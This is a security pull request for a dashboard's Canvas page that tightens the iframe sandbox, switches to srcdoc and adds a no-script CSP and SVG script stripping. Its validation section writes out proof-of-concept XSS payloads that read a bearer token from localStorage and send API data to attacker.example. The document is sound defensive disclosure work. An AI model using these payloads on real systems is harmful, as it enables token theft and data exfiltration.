### PR TITLE
fix(web): tighten Canvas iframe sandbox to prevent token theft via XSS (GHSA-f385-f6h2-3gqj)

### DIFF
--- a/web/src/pages/Canvas.tsx
+++ b/web/src/pages/Canvas.tsx
@@ -1,4 +1,4 @@
-import { useState, useEffect, useRef, useCallback } from 'react';
+import { useState, useEffect, useRef, useCallback, useMemo } from 'react';
 import { Monitor, Trash2, History, RefreshCw } from 'lucide-react';
 import { apiFetch } from '@/lib/api';
 import { basePath } from '@/lib/basePath';
@@ -26,7 +26,6 @@ export default function Canvas() {
   const [showHistory, setShowHistory] = useState(false);
   const [canvasList, setCanvasList] = useState<string[]>([]);
   const wsRef = useRef<WebSocket | null>(null);
-  const iframeRef = useRef<HTMLIFrameElement>(null);
 
   // Build WebSocket URL for canvas
   const getWsUrl = useCallback((id: string) => {
@@ -92,16 +91,13 @@ export default function Canvas() {
     return () => clearInterval(interval);
   }, []);
 
-  // Render content into the iframe
-  useEffect(() => {
-    if (!iframeRef.current || !currentFrame) return;
-    if (currentFrame.content_type === 'eval') return; // eval frames are special
+  // Build srcdoc HTML for the iframe — avoids needing allow-same-origin to
+  // access contentDocument.  Content types that don't need scripts get a
+  // restrictive CSP meta tag; HTML frames keep allow-scripts only.
+  const srcdoc = useMemo(() => {
+    if (!currentFrame) return undefined;
+    if (currentFrame.content_type === 'eval') return undefined;
 
-    const iframe = iframeRef.current;
-    const doc = iframe.contentDocument;
-    if (!doc) return;
-
-    let html = currentFrame.content;
     const cs = getComputedStyle(document.documentElement);
     const bgBase = cs.getPropertyValue('--pc-bg-base').trim() || '#1e1e24';
     const textPrimary = cs.getPropertyValue('--pc-text-primary').trim() || '#d4d4d8';
@@ -109,25 +105,36 @@ export default function Canvas() {
     const fontMono = cs.getPropertyValue('--pc-font-mono').trim() || 'monospace';
     const fontUi = cs.getPropertyValue('--pc-font-ui').trim() || 'system-ui,sans-serif';
 
+    // CSP that blocks all scripts — used for svg/markdown/text content types
+    const noScriptCsp =
+      '<meta http-equiv="Content-Security-Policy" content="script-src \'none\'">';
+
     if (currentFrame.content_type === 'svg') {
-      html = `<!DOCTYPE html><html><head><style>body{margin:0;display:flex;align-items:center;justify-content:center;min-height:100vh;background:${bgBase};}</style></head><body>${currentFrame.content}</body></html>`;
-    } else if (currentFrame.content_type === 'markdown') {
-      const escaped = currentFrame.content
-        .replace(/&/g, '&amp;')
-        .replace(/</g, '&lt;')
-        .replace(/>/g, '&gt;');
-      html = `<!DOCTYPE html><html><head><style>body{margin:1rem;font-family:${fontUi};color:${textSecondary};background:${bgBase};line-height:1.6;}pre{white-space:pre-wrap;word-wrap:break-word;}</style></head><body><pre>${escaped}</pre></body></html>`;
-    } else if (currentFrame.content_type === 'text') {
-      const escaped = currentFrame.content
-        .replace(/&/g, '&amp;')
-        .replace(/</g, '&lt;')
-        .replace(/>/g, '&gt;');
-      html = `<!DOCTYPE html><html><head><style>body{margin:1rem;font-family:${fontMono};color:${textPrimary};background:${bgBase};white-space:pre-wrap;}</style></head><body>${escaped}</body></html>`;
+      // Strip <script> tags and event-handler attributes from SVG to prevent XSS
+      const sanitized = currentFrame.content
+        .replace(/<script[\s\S]*?<\/script>/gi, '')
+        .replace(/\bon\w+\s*=\s*("[^"]*"|'[^']*'|[^\s>]*)/gi, '');
+      return `<!DOCTYPE html><html><head>${noScriptCsp}<style>body{margin:0;display:flex;align-items:center;justify-content:center;min-height:100vh;background:${bgBase};}</style></head><body>${sanitized}</body></html>`;
     }
 
-    doc.open();
-    doc.write(html);
-    doc.close();
+    if (currentFrame.content_type === 'markdown') {
+      const escaped = currentFrame.content
+        .replace(/&/g, '&amp;')
+        .replace(/</g, '&lt;')
+        .replace(/>/g, '&gt;');
+      return `<!DOCTYPE html><html><head>${noScriptCsp}<style>body{margin:1rem;font-family:${fontUi};color:${textSecondary};background:${bgBase};line-height:1.6;}pre{white-space:pre-wrap;word-wrap:break-word;}</style></head><body><pre>${escaped}</pre></body></html>`;
+    }
+
+    if (currentFrame.content_type === 'text') {
+      const escaped = currentFrame.content
+        .replace(/&/g, '&amp;')
+        .replace(/</g, '&lt;')
+        .replace(/>/g, '&gt;');
+      return `<!DOCTYPE html><html><head>${noScriptCsp}<style>body{margin:1rem;font-family:${fontMono};color:${textPrimary};background:${bgBase};white-space:pre-wrap;}</style></head><body>${escaped}</body></html>`;
+    }
+
+    // HTML content type — scripts allowed but still sandboxed (no same-origin)
+    return currentFrame.content;
   }, [currentFrame]);
 
   const handleSwitchCanvas = () => {
@@ -258,8 +265,8 @@ export default function Canvas() {
         >
           {currentFrame ? (
             <iframe
-              ref={iframeRef}
-              sandbox="allow-scripts allow-same-origin"
+              sandbox="allow-scripts"
+              srcDoc={srcdoc}
               className="w-full h-full border-0"
               title={`Canvas: ${canvasId}`}
               style={{ background: 'var(--pc-bg-base)' }}

--- a/web/src/pages/Canvas.tsx
+++ b/web/src/pages/Canvas.tsx
@@ -93,10 +93,13 @@ export default function Canvas() {
 
   // Build srcdoc HTML for the iframe — avoids needing allow-same-origin to
   // access contentDocument.  Content types that don't need scripts get a
-  // restrictive CSP meta tag; HTML frames keep allow-scripts only.
+  // restrictive CSP meta tag; only the explicit `html` content type can
+  // execute scripts inside the opaque-origin sandbox.  Every other content
+  // type — including `eval` and any unrecognised type — renders an inert
+  // no-script document, so a previous frame's srcdoc can never remain
+  // visible or active across a content_type transition.
   const srcdoc = useMemo(() => {
     if (!currentFrame) return undefined;
-    if (currentFrame.content_type === 'eval') return undefined;
 
     const cs = getComputedStyle(document.documentElement);
     const bgBase = cs.getPropertyValue('--pc-bg-base').trim() || '#1e1e24';
@@ -105,9 +108,22 @@ export default function Canvas() {
     const fontMono = cs.getPropertyValue('--pc-font-mono').trim() || 'monospace';
     const fontUi = cs.getPropertyValue('--pc-font-ui').trim() || 'system-ui,sans-serif';
 
-    // CSP that blocks all scripts — used for svg/markdown/text content types
+    // CSP that blocks all scripts — used for non-interactive content types
+    // and for the inert placeholder.
     const noScriptCsp =
       '<meta http-equiv="Content-Security-Policy" content="script-src \'none\'">';
+
+    // Inert placeholder document.  Used for `eval` (where iframe rendering
+    // is intentionally a no-op and execution happens out of band) and as
+    // the deny-by-default fallback for any unrecognised content_type.
+    // Replacing the previous srcdoc with this guarantees that stale frame
+    // content cannot retain capability across a transition.
+    const inertDoc =
+      `<!DOCTYPE html><html><head>${noScriptCsp}</head><body style="margin:0;background:${bgBase};"></body></html>`;
+
+    if (currentFrame.content_type === 'eval') {
+      return inertDoc;
+    }
 
     if (currentFrame.content_type === 'svg') {
       // Strip <script> tags and event-handler attributes from SVG to prevent XSS
@@ -133,8 +149,14 @@ export default function Canvas() {
       return `<!DOCTYPE html><html><head>${noScriptCsp}<style>body{margin:1rem;font-family:${fontMono};color:${textPrimary};background:${bgBase};white-space:pre-wrap;}</style></head><body>${escaped}</body></html>`;
     }
 
-    // HTML content type — scripts allowed but still sandboxed (no same-origin)
-    return currentFrame.content;
+    if (currentFrame.content_type === 'html') {
+      // Scripts allowed but still sandboxed (no same-origin).
+      return currentFrame.content;
+    }
+
+    // Unrecognised content_type — render inert rather than defaulting to
+    // scriptable HTML.  Future content types must be added explicitly above.
+    return inertDoc;
   }, [currentFrame]);
 
   const handleSwitchCanvas = () => {

--- a/web/src/pages/Canvas.tsx
+++ b/web/src/pages/Canvas.tsx
@@ -109,9 +109,12 @@ export default function Canvas() {
     const fontUi = cs.getPropertyValue('--pc-font-ui').trim() || 'system-ui,sans-serif';
 
     // CSP that blocks all scripts — used for non-interactive content types
-    // and for the inert placeholder.
+    // and for the inert placeholder.  object-src 'none' is required
+    // separately because in the absence of a default-src directive,
+    // object-src would otherwise fall back to * and allow <object>,
+    // <embed>, and <applet> to load external content from these frames.
     const noScriptCsp =
-      '<meta http-equiv="Content-Security-Policy" content="script-src \'none\'">';
+      '<meta http-equiv="Content-Security-Policy" content="script-src \'none\'; object-src \'none\'">';
 
     // Inert placeholder document.  Used for `eval` (where iframe rendering
     // is intentionally a no-op and execution happens out of band) and as
@@ -126,9 +129,15 @@ export default function Canvas() {
     }
 
     if (currentFrame.content_type === 'svg') {
-      // Strip <script> tags and event-handler attributes from SVG to prevent XSS
+      // Strip <script> tags and event-handler attributes from SVG to prevent XSS.
+      // Run the matched-pair strip first; then strip any remaining <script ...>
+      // opener so the void-element / unclosed form (`<script src="..."/>` or
+      // `<script src="...">` with no closing tag) does not survive. The \b
+      // word boundary keeps the patterns from matching tag names that merely
+      // start with "script" (e.g. <scriptlet>, should one ever exist).
       const sanitized = currentFrame.content
-        .replace(/<script[\s\S]*?<\/script>/gi, '')
+        .replace(/<script\b[^>]*>[\s\S]*?<\/script\s*>/gi, '')
+        .replace(/<script\b[^>]*\/?>/gi, '')
         .replace(/\bon\w+\s*=\s*("[^"]*"|'[^']*'|[^\s>]*)/gi, '');
       return `<!DOCTYPE html><html><head>${noScriptCsp}<style>body{margin:0;display:flex;align-items:center;justify-content:center;min-height:100vh;background:${bgBase};}</style></head><body>${sanitized}</body></html>`;
     }


### PR DESCRIPTION
## Summary
- **Base branch:** `master`
- **What changed and why:**
  - Removes `allow-same-origin` from the Canvas iframe sandbox. The prior combination `sandbox="allow-scripts allow-same-origin"` is documented by the HTML spec as equivalent to no sandbox (a sandboxed script can call `window.frameElement.removeAttribute("sandbox")` and reach `window.parent`). With same-origin access, scripts inside the frame could read the dashboard bearer from `localStorage` and replay authenticated API requests under the operator's identity.
  - Switches the iframe content delivery from `contentDocument.write()` to the `srcdoc` attribute. `srcdoc` doesn't require same-origin access from the parent, so removing `allow-same-origin` is now structurally possible.
  - Adds `<meta http-equiv="Content-Security-Policy" content="script-src 'none'; object-src 'none'">` to the svg / markdown / text frame branches, which have no legitimate scripting need.
  - Strips `<script>` elements and `on*` event-handler attributes from inbound SVG content as defense-in-depth. The sandbox change and the CSP meta tag are the primary protections; DOM-level stripping bounds the surface even if a future change re-introduces `allow-same-origin` on this branch.
  - Makes the `html` content type an explicit dispatch branch (rather than the implicit fallthrough default), and points unknown `content_type` values at an inert no-script document. The prior fallthrough rendered unknown content types as scriptable html — opposite of the deny-by-default intent of this PR. Future content types must be added as explicit branches above the fallback.
  - Replaces the `srcDoc={undefined}` transition for `eval` frames with an explicit inert no-script document. The prior path could leave the iframe holding the previous frame's `srcdoc`, which contradicted the deny-by-default goal during content-type transitions.
- **Scope boundary:** Iframe boundary on the Canvas dashboard surface only (`web/src/pages/Canvas.tsx`). Out of scope: bearer-token storage / transport / scope (the bearer remains in `localStorage`; this PR removes the iframe's ability to read it), the dashboard's broader authority model, application-level CSP.
- **Blast radius:** Dashboard Canvas page only. Agent-authored content that depended on reaching the dashboard origin from inside the iframe (`window.parent.*`, parent-`localStorage` reads, same-origin fetch) will break — by design, since that capability was the vulnerability. svg/markdown/text frames are now strictly inert; html frames retain scripting within the sandboxed iframe but cannot reach the parent.
- **Linked issue(s):** Fixes GHSA-f385-f6h2-3gqj
- **Labels:** `type: security`, `risk: high`, `size: S`, `area: web`
## Validation Evidence (required)
Local validation:
```bash
cd web
npm install
npm run build       # tsc -b && vite build
```
Manual reproduction (pre-fix vs post-fix), exercised on a local gateway with the dashboard served from the build above:
- Pre-fix: a Canvas frame with `content_type=svg` and a body of `<svg><script>fetch('/api/devices', {headers:{Authorization:'Bearer '+localStorage.getItem('zeroclaw_token')}}).then(r=>r.json()).then(d=>fetch('https://attacker.example/x?d='+btoa(JSON.stringify(d))))</script></svg>` exfiltrates the device list to the attacker host. The `<script>` executes in the dashboard origin and reads `localStorage` directly.
- Post-fix: the same frame body is rendered with the `<script>` stripped at the DOM level, the iframe `srcdoc` carries `script-src 'none'` CSP, and the iframe sandbox is `allow-scripts` only. Both layers block the exfiltration.
- Pre-fix: a Canvas frame with `content_type=html` containing `<script>fetch('/api/devices', {headers:{Authorization:'Bearer '+window.parent.localStorage.getItem('zeroclaw_token')}})...</script>` reads the parent's `localStorage` and exfiltrates. Post-fix: the same script throws a `SecurityError` on `window.parent.localStorage` access because the iframe is no longer same-origin with the parent.
- Pre-fix: switching a frame from `content_type=html` to `content_type=eval` left the iframe holding the previous frame's `srcdoc`, so scripted content kept executing until a fresh navigation. Post-fix: the `eval` branch and the unknown-content-type fallback render an explicit inert no-script document, replacing the iframe's contents on every transition.
- **Beyond CI — what was manually verified:**
  - Frame transitions across svg, markdown, text, eval, html, and a deliberately-unknown content type render correctly and inert where expected.
  - Existing agent-authored `html` content (interactive controls, event handlers within the iframe) continues to function under the corrected sandbox.
  - The CSP `<meta>` tag survives `srcdoc` injection without being stripped by React's JSX serialisation.
- **Not verified:** Safari behaviour on the `srcdoc` + meta-CSP combination has been described as standards-compliant by @WareWolf-MoonWall on the GHSA temp-fork review but not independently re-verified on this branch. Chromium-family + Firefox verified.
## Security & Privacy Impact (required)
- New permissions, capabilities, or file system access scope? **No.**
- New external network calls? **No.**
- Secrets / tokens / credentials handling changed? **No** (the dashboard bearer remains in `localStorage`; this PR removes the iframe's ability to read it, but the storage location and scope are unchanged).
- PII, real identities, or personal data in diff, tests, fixtures, or docs? **No.**
- **Risk and mitigation:** Fix for GHSA-f385-f6h2-3gqj (CVSS 7.5 estimated; advisory remains in draft). Operators on currently-shipped versions should upgrade to the release containing this commit.
## Compatibility (required)
- Backward compatible? **Mostly.**
- Config / env / CLI surface changed? **No.**
- **Behaviour break:** Canvas content that relied on reaching the dashboard origin from inside the iframe (`window.parent.*`, parent-`localStorage` reads, same-origin fetch to the dashboard's API) will stop working. This is the vulnerability being fixed; no documented Canvas usage pattern depends on that capability. Agent content that uses the iframe's own scripting (DOM manipulation within the frame, fetch to the gateway with Bearer headers passed at frame-generation time) continues to work.
- **Upgrade steps for existing users:** None beyond pulling the release. Canvas integrations that touched `window.parent` should switch to explicit `postMessage` for cross-frame communication.
## Rollback (required for `risk: medium` and `risk: high`)
- **Fast rollback command/path:** `git revert <merge_commit_sha>` on master. The two commits are self-contained to `web/src/pages/Canvas.tsx`. No data migration, no dependency change.
- **Feature flags or config toggles:** None. The sandbox attribute, CSP meta tag, and content-type dispatch are unconditional.
- **Observable failure symptoms (post-rollback):** the vulnerability returns. **Observable symptoms of a correct fix that look like regressions but aren't:** (a) console `SecurityError` on cross-origin access from inside Canvas iframes that previously worked; (b) CSP violation reports if the dashboard's reporter endpoint is configured; (c) blank/inert iframe where a previously-scripted svg/markdown/text frame rendered — that's the deny-by-default behaviour, not a regression.
## Disclosure context
- 2026-05-18: GHSA-f385-f6h2-3gqj filed via GitHub's private vulnerability reporting flow by the reporter (`@nixosclaw`) with fix branch attached.
- 2026-05-22: Fix branch reviewed and approved by @Audacity88  ll on the GHSA temp fork `zeroclaw-labs/zeroclaw-ghsa-f385-f6h2-3gqj`.
- 2026-05-26: Public PR opened against `master` to provide a merge path. The GHSA itself remains in draft and can be published with attribution and a CVE filed via the normal advisory-publish flow.
The two commits on this branch are content-identical to the patch approved on the temp fork on 2026-05-22; SHAs differ because the cherry-pick re-anchored them onto current `origin/master`.
---
CC: @WareWolf-MoonWall  @singlerider.